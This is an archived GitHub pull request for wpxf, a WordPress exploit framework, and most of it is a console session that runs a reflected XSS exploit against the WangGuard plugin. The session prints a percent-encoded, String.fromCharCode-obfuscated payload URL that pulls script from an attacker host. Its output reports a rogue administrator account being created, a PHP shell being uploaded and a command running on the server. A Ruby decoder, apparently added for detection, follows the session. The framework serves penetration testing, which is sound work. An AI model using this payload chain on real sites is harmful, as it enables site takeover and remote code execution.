This repository was archived by the owner on Oct 22, 2020. It is now read-only.

@phyushin
Contributor

Update to use xss_url_and_ascii_encoded_include_script over xss_ascii_encode_include_script

example:

wpxf > use exploit/wang_guard_reflected_xss_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::WangGuardReflectedXssShellUpload:0x1c11e28>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set host 192.168.0.48

  [+] Set host => 192.168.0.48

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set xss_host 192.168.0.36

  [+] Set xss_host => 192.168.0.36

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x1be9580>

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/wang_guard_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.48/wp-admin/admin.php?page=wangguard_users_info&userIP=%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C51%2C54%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C122%2C114%2C103%2C107%2C75%2C120%2C112%2C106%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E%3C

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, lhisIQ:OurUpNZqjU
  [-] HTTP server stopped
  [-] Authenticating with WordPress using lhisIQ:OurUpNZqjU...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.48/wp-content/plugins/CtepZfbKHQ/wLcwBaezGR.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/wang_guard_reflected_xss_shell_upload] >
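
The URL printed in the session above wraps the script in percent-encoding and a String.fromCharCode list, so a log rule that looks for a literal script include will not match the raw request line. An added example (not part of this pull request or of wpxf) that undoes both layers before matching; the sample URI, the h.test host, the marker patterns and the round limit are constructed assumptions:

```ruby
# Added example (not wpxf code): peel the encoding layers off a logged
# request URI so signature matching sees the script that would actually run.

FROM_CHAR_CODE = /String\.fromCharCode\(\s*(\d{1,7}(?:\s*,\s*\d{1,7})*)\s*\)/i
SCRIPT_MARKERS = /<script|createElement\(\s*["']script|\beval\s*\(/i
URL_PATTERN    = %r{https?://[^\s"'<>()]+}i
MAX_ROUNDS     = 5 # assumed cap so hostile input cannot force endless passes

# Constructed sample request URI (host h.test is a placeholder).
SAMPLE = "/wp-admin/admin.php?page=wangguard_users_info&userIP=" \
         "%3E%3Cscript%3Eeval%28String.fromCharCode%28104%2C116%2C116%2C112" \
         "%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C104%2C46%2C116" \
         "%2C101%2C115%2C116%2C37%2C50%2C70%2C120%29%29%3C%2Fscript%3E%3C"

# Decode %XX escapes byte-wise; malformed escapes are left untouched.
def percent_decode(str)
  str.b.gsub(/%(\h\h)/) { Regexp.last_match(1).hex.chr }
end

# Replace String.fromCharCode(n, ...) with the characters it evaluates to.
def expand_char_codes(str)
  str.b.gsub(FROM_CHAR_CODE) do
    codes = Regexp.last_match(1).split(",").map { |n| n.to_i & 0xFFFF }
    codes.pack("U*").b
  end
end

# Alternate both decoders until the string stops changing.
def normalise(uri)
  current = uri.b
  MAX_ROUNDS.times do
    decoded = expand_char_codes(percent_decode(current))
    break if decoded == current
    current = decoded
  end
  current
end

# Summarise what a detection rule or an analyst needs from one request.
def analyse(uri)
  decoded = normalise(uri)
  { suspicious: decoded.match?(SCRIPT_MARKERS),
    urls: decoded.scan(URL_PATTERN),
    decoded: decoded }
end

puts analyse(SAMPLE).inspect if __FILE__ == $PROGRAM_NAME
```

The `urls` field is the part worth alerting on: it is the host the injected script would be fetched from, which only appears after the second decoding pass.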

@rastating rastating merged commit e2f311e into rastating:development Jun 14, 2017
@rastating
Owner

Merged, thanks for the contribution 🍻

@phyushin phyushin deleted the wang_guard_reflected_xss branch February 23, 2018 21:42